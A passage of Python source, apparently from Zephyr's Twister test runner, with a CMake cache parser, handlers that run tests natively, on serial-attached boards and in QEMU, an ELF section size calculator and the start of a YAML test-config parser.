def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
# ignore SerialException which may happen during the serial device
# power off/on process.
except serial.SerialException:
pass
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
# Receive parameters from an runner_params field
# of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
# sometimes a test instance hasn't been executed successfully with no
# status, in order to include it into final report,
# so fill the results as blocked
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
